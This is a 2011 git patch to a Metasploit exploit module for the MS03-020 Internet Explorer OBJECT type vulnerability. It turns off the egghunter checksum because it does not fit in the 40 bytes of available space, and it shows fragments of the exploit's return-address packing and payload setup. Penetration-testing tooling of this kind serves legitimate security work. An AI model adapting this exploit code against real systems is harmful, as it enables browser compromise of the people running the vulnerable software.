From 6345fec06cd977e9964c508a32d97ebaed669b8e Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 18 May 2011 19:48:06 +0000 Subject: [PATCH] checksum support for egghunter disabled, because not enough room for it. See r4552. git-svn-id: file:///home/svn/framework3/trunk@12656 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index da6b0d1392..75b7f129d3 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -96,7 +96,10 @@ class Metasploit3 < Msf::Exploit::Remote # Pack the values ret = [ ret ].pack('V') clean = [ clean ].pack('V') - hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => true }) + + #checksum is disabled because it is 54 bytes big, and we have only 40 bytes of room + #to fit the egghunter. + hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => false }) egg = hunter[1] # Now, build out the HTTP response payload